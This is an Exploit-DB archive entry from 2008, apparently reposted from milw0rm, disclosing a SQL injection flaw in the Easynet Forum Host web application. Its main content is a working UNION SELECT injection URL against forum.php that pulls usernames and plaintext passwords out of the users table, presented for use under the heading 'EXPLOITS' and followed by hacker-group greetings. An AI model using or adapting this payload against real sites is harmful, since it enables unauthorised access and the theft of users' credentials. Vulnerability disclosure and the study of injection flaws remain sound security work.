Easynet Forum Host forum.php forum SQL Injection Vulnerability

2008-04-05T00:00:00
ID EDB-ID:5372
Type exploitdb
Reporter t0pP8uZz
Modified 2008-04-05T00:00:00

Description

Easynet Forum Host (forum.php forum) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            --==+================================================================================+==--
--==+		       Easynet Forum Host SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 5 April 2008
SCRIPT DOWNLOAD: N/A


SITE: http://www.easynet4u.com/forum


DORK: N/A

DESCRIPTION: retrive users username and plaintext password.

EXPLOITS:

EXPLOIT 1: http://www.server.com/SCRIPT_PATH/forum.php?forum=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*


GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew!



--==+================================================================================+==--
--==+		       Easynet Forum Host SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-05]